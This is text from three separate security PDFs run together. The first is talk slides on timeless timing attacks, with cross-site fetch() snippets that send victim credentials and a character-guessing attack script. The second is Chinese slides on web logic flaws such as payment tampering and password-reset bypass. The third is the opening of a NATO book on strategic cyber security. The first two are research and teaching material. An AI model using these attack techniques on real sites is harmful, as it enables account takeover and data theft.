50µs           333      4,492    7,386   20     14
20µs           2,926    16,820   -       41     16
10µs           23,220   -        -       126    20
5µs            -        -        -       498    42
Smallest diff  10µs     20µs     50µs    150ns  150ns

Timeless Timing Attacks (anywhere on the Internet)
50µs           6
20µs           6
10µs           11
5µs            52
Smallest diff  100ns

Attack Scenarios 1. direct timing attack 2. cross-site timing attack 3. Wi-Fi authentication

Cross-site Timing Attack
• Victim user lands on malicious website (by clicking a link, malicious advertisement, urgent need to look at cute animal videos, …)
• Attacker launches attack from JavaScript to trigger requests to targeted web server
• Victim’s cookies are automatically included in request; request is processed using victim’s authentication
• Attacker observes response order (e.g. via fetch.then()), and leaks sensitive information that victim shared with website
• Real-world example: abuse search function on HackerOne to leak information about private reports

Cross-site Timeless Timing Attack
• Attacker has no low-level control over network; browser chooses how to send request to kernel
• Need another technique to force 2 requests in single packet
• TCP congestion control to the rescue!!
• Congestion control prevents client from sending all packets at once
needs ACK from server before sending more • When following requests are queued, they are merged in single packet 👍

fetch(target_bogus_url, { "mode": "no-cors", "credentials": "include", "method": "POST", "body": veryLongString });
fetch(target_baseline_url, { "mode": "no-cors", "credentials": "include" });
fetch(target_alt_url, { "mode": "no-cors", "credentials": "include" });

[Slide animation: the three fetch() calls land in the victim's TCP packet queue; the large bogus POST keeps the queue occupied, so the baseline and alternative requests queue up behind it and leave in a single packet]

Attack Scenarios 1. direct timing attack 2. cross-site timing attack 3. Wi-Fi authentication

Exploiting Wi-Fi authentication
 (WPA2 w/ EAP-pwd) WPA2 & EAP-pwd • WPA2 is one of the most widely used Wi-Fi protocols • Authentication can be done using certificates (e.g. EAP-PEAP), or using passwords, relying on EAP-pwd • Authentication happens between client and authentication server 
(e.g. FreeRADIUS), access point forwards messages • Communication between AP and authentication server is typically protected using TLS • EAP-pwd uses hash-to-curve to verify password • A timing leak was found! 😱 • “Fortunately” small timing difference, so considered not possible to exploit 😁

[Message-flow diagrams: Access Point, Clients 1-3 and FreeRADIUS - association, EAP-id request/response, PWD-id request/response and ReAuth messages relayed as RadSec frames; the PWD-id responses arrive in a single A-MPDU frame and pass through the Access Point buffer]

Bruteforcing Wi-Fi passwords
• Timing side-channel in hash-to-curve method is exploited
• Response order is enough information to perform bruteforce attack
• Probability of incorrect order only 0.38%
• Example RockYou password dump
• 14M passwords
• 40 measurements needed
• ~86% success probability
• Costs less than $1 to bruteforce password on cloud

Overview 1. direct timing attack 2. cross-site timing attack 3. Wi-Fi authentication

DEMO

Demo target (PHP):
$documents = textSearch($query);
if (count($documents) > 0) {
    $securityLevel = getSecurityLevel($user);
    // filter documents based on security level...
}

attack.py:
url_prefix = 'https://vault.drud.us/search.php?q=DEFCON_PASSWORD='
r1 = H2Request('GET', url_prefix + char)
# @ is not part of the charset so serves as baseline
r2 = H2Request('GET', url_prefix + '@')
async with H2Time(r1, r2, num_request_pairs=15) as h2t:
    results = await h2t.run_attack()
num_negative = len([x for x in results if x < 0])
pct_reverse_order = num_negative / len(results)
if pct_reverse_order > threshold:
    print('Found next character: %s' % char)

Conclusion • Timeless timing attacks are not affected by network jitter at all • Perform remote timing attacks with an accuracy similar to an attack against
 the local system • Attacks can be launched against protocols that feature multiplexing
 or by leveraging a transport protocol that enables encapsulation • All protocols that meet the criteria can be susceptible to timeless
 timing attacks: we created practical attacks against HTTP/2 and EAP-pwd (Wi-Fi) Thank you! @tomvangoethem @vanhoefm https://github.com/DistriNet/timeless-timing-attacks Demo sources:
pdf
Web渗透测试之逻辑漏洞 挖掘 演讲嘉宾:hackbar 上海银基信息安全技术股份有限公司 简单VS复杂 1.思考 1.1、利用工具简单: 数据包抓取工具(Burpsuit、fiddler等) 1.2、思路复杂: 核心: 绕过真实用户身份或正常业务流程达到预期的目的 1.2.1、用户身份:认证 用户身份特性认证 本地认证 服务器端认证 1.2.2、业务流程:对业务的熟悉程度(各种类 型的网站、业务模式) 电信网厅业务清单图解 2、逻辑漏洞类型 支付漏洞 密码找回漏洞 任意用户登录漏洞 认证缺陷(弱认证、认证凭证获取) 接口枚举 越权(有条件的越权:空值绕过) 。。。。。。。 2.1、支付漏洞 2.1.1、支付漏洞突破口: 一、订单相关 1.选择商品时修改商品价格; 2.选择商品时将商品数量设为负数; 3.商品剩余1时,多人同时购买,是否产生冲突; 4.商品为0时是否还能购买; 5.生成订单时修改订单金额; 二、结算相关 1.优惠打折活动多次重复使用; 2.拦截数据包,修改订单金额; 3.拦截数据包,修改支付方式; 4.伪造虚假订单,刷单; 2.1.1、支付漏洞突破口: 三、支付相关 1.拦截数据包,伪造第三方确认信息; 2.保存用户付款信息被窃取; 四、退货相关 1、绕过商家确认直接退货; 2、绕过商品类型直接退货;(退货是否允许) 五、收货相关 1、绕过客户确认直接收货; 2.2、密码重置漏洞 用户密码找回方式: 手机验证码、邮箱、密保问题、自动生成新密码、密码找回链接 发送、 2.2.1、密码重置突破口: 认证凭证暴力破解 认证凭证回显 认证凭证重复使用 重新绑定 用户身份特性认证 服务器端认证 本地认证 密码找回流程绕过 。。。。。。。 2.3、任意用户登录 空密码绕过 身份替换 认证凭证篡改 。。。。。。。 2.4、认证缺陷漏洞 弱验证 空验证 认证凭证有效性&唯一性 2.5、越权漏洞 普通越权 未授权访问(登录凭证验证) 绕过授权模式(参数构造等) 2.6、接口枚举 业务接口因为没有做验证或者验证机制缺陷,容易遭到枚举攻击 撞库 订单、优惠券等遍历 3、案例分享 支付漏洞 任意用户密码重置漏洞 任意用户登录漏洞 3.1.1、支付漏洞 一分钱看电影 3.1.1、支付漏洞 一分钱看电影 3.1.1、支付漏洞 一分钱看电影 3.1.1、支付漏洞 一分钱看电影 3.1.1、支付漏洞 一分钱看电影 3.1.1、支付漏洞 一分钱看电影 3.1.2支付漏洞 某商城任意积分 兑换 3.1.2支付漏洞 某商城任意积 分兑换 由于积分不够, 无法兑换: 3.1.2支付漏洞 某商城任意积 分兑换 由于积分不够, 无法兑换,但 是可以通过修 改数据包返回 值,让页面前 端显示兑换功 能键 3.1.2支付漏洞 某商城任意积 分兑换 由于积分不够, 无法兑换,但 是可以通过修 改数据包返回 值,让页面前 端显示兑换功 能键 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 商户版 3.2.1密码重置漏洞 认证凭证脆弱性 商户版 3.2.1密码重置漏洞 认证凭证脆弱性 商户版 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.5密码重置漏洞 绕过多重认证 3.2.5密码重置漏洞 绕过多重认证 首先找回自己 的账号00XXXX XX00密码 3.2.5密码重置漏洞 绕过多重认证 得到邮箱验 证码:044837 3.2.5密码重置漏洞 绕过多重认证 邮箱验证码04 4837可以重复 利用,用于账 号00XXXXXX99 密码找回: 3.2.5密码重置漏洞 绕过多重认证 邮箱验证码04 4837可以重复 利用,用于账 号00XXXXXX99 密码找回: 3.2.5密码重置漏洞 绕过多重认证 自己的账号00 XXXXXX00获取 到第二个邮箱 验证码,进入 下一步;提交 ,抓去数据包 ,获取正确的 response值。 3.2.5密码重置漏洞 绕过多重认证 然后再去进行 账号00XXXXXX 99的密码重置: 3.2.5密码重置漏洞 绕过多重认证 验证码随便乱 输入,提交, 抓去数据包, 替换response: 3.2.5密码重置漏洞 绕过多重认证 验证码随便乱 输入,提交, 抓去数据包, 替换response: 3.2.5密码重置漏洞 绕过多重认证 进入输入新密 码界面,输入 新密码: 3.2.5密码重置漏洞 绕过多重认证 密码重置成功: 3.2.5密码重置漏洞 绕过多重认证 登录验证: 3.3.1任意用户登录漏洞 空密码绕过 3.3.1任意用户登录漏洞 空密码绕过 3.3.1任意用户登录漏洞 空密码绕过 3.3.1任意用户登录漏洞 空密码绕过 3.3.2任意用户登录漏洞 认证凭证替换 3.3.2任意用户登录漏洞 认证凭证替换 3.3.2任意用户登录漏洞 认证凭证替换 3.3.2任意用户登录漏洞 认证凭证替换 谢谢!
pdf
© 2011 NATO Cooperative Cyber Defence Centre of Excellence, June 2011 All rights reserved. No part of this pub- lication may be reprinted, reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording or otherwise, without the prior written permission of the NATO Cooperative Cyber Defence Centre of Excellence. Publisher: CCD COE Publication Filtri tee 12, 10132 Tallinn, Estonia Tel: +372 717 6800 Fax: +372 717 6308 E-mail: ccdcoe@ccdcoe.org www.ccdcoe.org Print: OÜ Greif Trükikoda Design & Layout: Marko Söönurm Legal notice NATO Cooperative Cyber Defence Centre of Excellence assumes no responsibility for any loss or harm arising from the use of information contained in this book. ISBN 978-9949-9040-5-1 (print) ISBN 978-9949-9040-6-8 (epub) ISBN 978-9949-9040-7-5 (pdf) KENNETH GEERS STRATEGIC CYBER SECURITY NATO Cooperative Cyber Defence Centre of Excellence Abstract This book argues that computer security has evolved from a technical discipline to a strategic concept. The world’s growing dependence on a powerful but vulnerable Internet – combined with the disruptive capabilities of cyber attackers – now threat- ens national and international security. Strategic challenges require strategic solutions. The author examines four nation- state approaches to cyber attack mitigation. • Internet Protocol version 6 (Ipv6) • Sun Tzu’s Art of War • Cyber attack deterrence • Cyber arms control The four threat mitigation strategies fall into several categories. IPv6 is a technical solution. Art of War is military. The third and fourth strategies are hybrid: deter- rence is a mix of military and political considerations; arms control is a political/ technical approach. The Decision Making Trial and Evaluation Laboratory (DEMATEL) is used to place the key research concepts into an influence matrix. DEMATEL analysis demon- strates that IPv6 is currently the most likely of the four examined strategies to improve a nation’s cyber defense posture. There are two primary reasons why IPv6 scores well in this research. First, as a technology, IPv6 is more resistant to outside influence than the other proposed strategies, particularly deterrence and arms control, which should make it a more reliable investment. Second, IPv6 addresses the most significant advantage of cyber attackers today – anonymity. About the Author Kenneth Geers, PhD, CISSP, Naval Criminal Investigative Service (NCIS), is a Scientist and the U.S. Representative to the North Atlantic Treaty Organization Cooperative Cyber Defence Centre of Excellence (NATO CCD COE) in Tallinn, Estonia. To Jeanne 6 CONTENTS I. INTRODUCTION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1. Cyber Security and National Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 THE NATURE AND SCOPE OF THIS BOOK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 RESEARCH OUTLINE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 II. BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY . . . . . . . . . . . . . . . . . . . . . . 
. . . . . . . . . 19 2. Cyber Security: A Short History . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 THE POWER OF COMPUTERS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 THE RISE OF MALICIOUS CODE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 LONE HACKER TO CYBER ARMY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 NATIONAL SECURITY PLANNING . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28 MORE QUESTIONS THAN ANSWERS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31 3. Cyber Security: A Technical Primer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 CYBER SECURITY ANALYSIS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 CASE STUDY: SAUDI ARABIA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42 MODELING CYBER ATTACK AND DEFENSE IN A LABORATORY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50 4. Cyber Security: Real-World Impact . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 CYBER SECURITY AND INTERNAL POLITICAL SECURITY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 CASE STUDY: BELARUS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 INTERNATIONAL CONFLICT IN CYBERSPACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 III. NATION-STATE CYBER ATTACK MITIGATION STRATEGIES . . . . . . . . . . . . . . . . . . . . . . . 87 5. Next Generation Internet: Is IPv6 the Answer? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 IPV6 ADDRESS SPACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 IMPROVED SECURITY? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 IPV6 ANSWERS SOME QUESTIONS, CREATES OTHERS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
. . . . . . . . . . . . . . . . . 89 PRIVACY CONCERNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91 UNEVEN WORLDWIDE DEPLOYMENT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92 DIFFERENCES OF OPINION REMAIN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94 6. Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? . . . . . . . . . . . . . . . . . . . 95 WHAT IS CYBER WARFARE? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95 WHAT IS ART OF WAR? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96 STRATEGIC THINKING . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97 CULTIVATING SUCCESS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99 OBJECTIVE CALCULATIONS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102 TIME TO FIGHT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 THE IDEAL COMMANDER . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107 7 ART OF CYBER WAR: ELEMENTS OF A NEW FRAMEWORK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109 7. Deterrence: Can We Prevent Cyber Attacks? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111 CYBER ATTACKS AND DETERRENCE THEORY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111 CYBER ATTACK DETERRENCE BY DENIAL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113 CYBER ATTACK DETERRENCE BY PUNISHMENT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117 MUTUALLY ASSURED DISRUPTION (MAD) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121 8. Arms Control: Can We Limit Cyber Weapons? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123 CYBER ATTACK MITIGATION BY POLITICAL MEANS . . . . . . . . . . . . . . . . . . . . . . . . . 
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123 THE CHEMICAL WEAPONS CONVENTION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124 CWC: LESSONS FOR CYBER CONFLICT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125 TOWARD A CYBER WEAPONS CONVENTION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127 THE CHALLENGES OF PROHIBITION AND INSPECTION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130 IV. DATA ANALYSIS AND RESEARCH RESULTS. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 9. DEMATEL and Strategic Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 DEMATEL INFLUENCING FACTORS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 NATIONAL SECURITY THREATS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 KEY CYBER ATTACK ADVANTAGES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135 CYBER ATTACK CATEGORIES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137 STRATEGIC CYBER ATTACK TARGETS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138 CYBER ATTACK MITIGATION STRATEGIES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 10. Key Findings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 142 THE “EXPERT KNOWLEDGE” MATRIX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 142 CAUSAL LOOP DIAGRAM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146 CALCULATING INDIRECT INFLUENCE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147 ANALYZING TOTAL INFLUENCE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150 V. CONCLUSION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155 11. 
Research contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155 SUGGESTIONS FOR FUTURE RESEARCH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156 VI. BIBLIOGRAPHY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158 8 Acknowledgements I would like to thank faith, hope, love, family, friends, NCIS, CCD CoE, TUT, my PhD advisor Professor emeritus Leo Võhandu, and Vana Tallinn. 9 Cyber Security and National Security I. INTRODUCTION 1. CYBER SECURITY AND NATIONAL SECURITY Cyber security has quickly evolved from a technical discipline to a strategic concept. Globalization and the Internet have given individuals, organizations, and nations incredible new power, based on constantly developing networking technology. For everyone – students, soldiers, spies, propagandists, hackers, and terrorists – infor- mation gathering, communications, fund-raising, and public relations have been digitized and revolutionized. As a consequence, all political and military conflicts now have a cyber dimension, the size and impact of which are difficult to predict, and the battles fought in cyber- space can be more important than events taking place on the ground. As with ter- rorism, hackers have found success in pure media hype. As with Weapons of Mass Destruction (WMD), it is difficult to retaliate against an asymmetric attack. The astonishing achievements of cyber espionage serve to demonstrate the high return on investment to be found in computer hacking. The start-up cost is low, and traditional forms of espionage, such as human intelligence, are more dangerous. Computer hacking yields free research and development data and access to sensitive communications. National leaders, who frequently address cyber espionage on the world stage, are worried.1 The use and abuse of computers, databases, and the networks that connect them to achieve military objectives was known in the early 1980s in the Soviet Union as the Military Technological Revolution (MTR). After the 1991 Gulf War, the Pentagon’s Revolution in Military Affairs was almost a household term.2 A cyber attack is not an end in itself, but a powerful means to a wide variety of ends, from propaganda to espionage, from denial of service to the destruction of critical infrastructure. The nature of a national security threat has not changed, but the Internet has provided a new delivery mechanism that can increase the speed, scale, and power of an attack. Dozens of real world examples, from the U.S. to Russia, from the Middle East to the Far East, prove that the ubiquity and vulnerability of the Internet have tangible po- litical and military ramifications. As the Internet becomes more powerful and as our dependence upon it grows, cyber attacks may evolve from a corollary of real-world disputes to play a lead role in future conflicts. 1 Spiegel, 2007; Cody, 2007. 2 Mishra, 2003. 10 INTRODUCTION In 1948, Hans Morgenthau wrote that national security depends on the integrity of a nation’s borders and its institutions.3 In 2011, military invasion and terrorist attack remain the most certain way to threaten the security of an adversary. 
However, as national critical infrastructures, including everything from elections to electricity, are computerized and connected to the Internet, national security planners will also have to worry about cyber attacks. It is a fact that large, complex infrastructures are easier to manage with comput- ers and common operating systems, applications, and network protocols. But this convenience comes at a price. Connectivity is currently well ahead of security, and this makes the Internet, and Internet users, vulnerable to attack. There are not only more devices connected to the Internet every day, but there are dozens of additions to the Common Vulnerabilities and Exposures (CVE) database each month.4 These combine to create what hackers call the expanding “attack surface.” Hackers tend to be creative people, and they are able to exploit such complexity to find ways to read, delete, and/or modify information without proper authorization. One paradox of the cyber battlefield is that both big and small players have advan- tages. Nations robust in IT exploit superior computing power and bandwidth; small countries and even lone hackers exploit the amplifying power of the Internet to attack a stronger conventional foe. Furthermore, Internet-dependent nations are a tempting target because they have more to lose when the network goes down. In cyber conflict, the terrestrial distance between adversaries can be irrelevant because everyone is a next-door neighbor in cyberspace. Hardware, software, and bandwidth form the landscape, not mountains, valleys, or waterways. The most powerful weapons are not based on strength, but logic and innovation. It is also true that cyber attacks are constrained by the limited terrain of cyberspace. There are many skeptics of cyber warfare. Basically, tactical victories amount to a successful reshuffling of the bits – the ones and zeros – inside a computer. Then the attacker must wait to see if anything happens in the real world. There is no guar- antee of success. Network reconfiguration, software updates, and human decision- making change cyber terrain without warning, and even a well-planned attack can fall flat.5 In fact, the dynamic nature of the Internet offers benefits to both an attacker and a defender. Many cyber battles will be won by the side that uses cutting-edge tech- nologies to greater advantage. Although an attacker has more targets to strike and 3 Morgenthau, 1948. 4 CVE, 2011. 5 Parks & Duggan, 2001. 11 Cyber Security and National Security more ways to hit them, a defender has the means to design an ever-increasing level of network redundancy and survivability.6 In 2011, an attacker’s most important advantage remains a degree of anonymity. Smart hackers hide within the international, maze-like architecture of the Internet. They route attacks through countries with which a victim’s government has poor diplomatic relations or no law enforcement cooperation. In theory, even a major cyber conflict could be fought against an unknown adversary. Law enforcement and counterintelligence investigations suffer from the fact that the Internet is an international entity, and jurisdiction ends every time a telecom- munications cable crosses a border. In the case of a state-sponsored cyber attack, international cooperation is naturally non-existent. 
The anonymity or “attribution” problem is serious enough that it increases the odds that damaging cyber attacks on national critical infrastructures will take place in the absence of any traditional, real-world warning, during times of nominal peace. Cyber defense suffers from the fact that traditional security skills are of marginal help in defending computer networks, and it is difficult to retain personnel with marketable technical expertise. Talented computer scientists prefer more exciting, higher-paying positions elsewhere. As a consequence, at the technical level, it can be difficult even knowing whether one is under cyber attack. At the political level, the intangible nature of cyberspace can make the calculation of victory, defeat, and battle damage a highly subjective undertaking. And with cyber law, there is still not enough expertise to keep pace with the threat. Finally, cyber defense suffers from the fact that there is little moral inhibition to computer hacking, which relates primarily to the use and abuse of computer code. So far, there is little perceived human suffering. All things considered, the current balance of cyber power favors the attacker. This stands in contrast to our historical understanding of warfare, in which the defender has traditionally enjoyed a home field advantage. Therefore, many governments may conclude that, for the foreseeable future, the best cyber defense is a good offense. First, cyber attacks may be required to defend the homeland; second, they are a powerful and sometimes deniable way to project national power. 6 Lewis, 2002. 12 INTRODUCTION Can a cyber attack pose a serious threat to national security? Decision makers are still unsure. Case studies are few in number, much information lies outside the pub- lic domain, there have been no wars between two first-class militaries in the Inter- net era, and most organizations are still unsure about the state of their own cyber security. Conducting an “information operation” of strategic significance is not easy, but neither is it impossible. During World War II, the Allies took advantage of having broken the Enigma cipher to feed false information to Adolf Hitler, signaling that the D-Day invasion would take place at 